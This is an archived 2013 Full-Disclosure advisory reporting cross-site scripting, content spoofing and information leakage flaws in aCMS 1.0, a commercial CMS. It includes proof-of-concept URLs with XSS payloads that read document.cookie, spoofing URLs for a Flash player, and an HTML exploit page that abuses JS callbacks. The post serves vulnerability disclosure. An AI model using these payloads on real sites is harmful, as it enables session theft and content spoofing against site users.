| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <007801ce5988$7afdf0d0$9b7a6fd5@pc>
Date: Sat, 25 May 2013 23:41:14 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Multiple vulnerabilities in aCMS
Hello list!
These are Cross-Site Scripting, Content Spoofing and Information Leakage
vulnerabilities in aCMS. This is commercial CMS. There are multiple
vulnerabilities in aCMS and it's the first part of them.
-------------------------
Affected products:
-------------------------
Vulnerable are aCMS 1.0 and previous versions.
-------------------------
Affected vendors:
-------------------------
Almacor
http://almacor.ru
----------
Details:
----------
Cross-Site Scripting (WASC-08):
For ZeroClipboard10.swf XSS via id parameter and XSS via copying payload
into clipboard are possible.
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
Content Spoofing (WASC-12):
Swf-file accepts arbitrary addresses in parameter flvToPlay and startImage,
which allows to spoof content of flash - i.e. by setting addresses of video
and/or image files from other site.
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml
Swf-file accepts arbitrary addresses in parameter flvToPlay, which allows to
spoof content of flash - i.e. by setting address of playlist file from other
site (parameters thumbnail and url in xml-file accept arbitrary addresses).
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
Cross-Site Scripting (WASC-08):
If at the site at page with flv_player.swf (with parameter jsCallback=true,
or if there is possibility to set this parameter for flv_player.swf) there
is possibility to include JS code with function flvStart() and/or flvEnd()
(via HTML Injection), then it's possible to conduct XSS attack. I.e.
JS-callbacks can be used for XSS attack.
Example of exploit:
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"
height="50%" quality=high
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
Information Leakage (WASC-13):
http://site/assets/1
At error 404 page there are Source Code Disclosure, Full Path Disclosure and
showing list of the files and other information.
------------
Timeline:
------------
2013.03.04 - informed developers about part of the vulnerabilities.
2013.04.03 - informed developers about another part of the vulnerabilities.
2013.04.05 - announced at my site.
2013.04.07 - informed developers about another part of the vulnerabilities.
2013.05.25 - informed developers about another part of the vulnerabilities.
In all cases the developers just ignored all messages via different e-mails
and contact form.
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists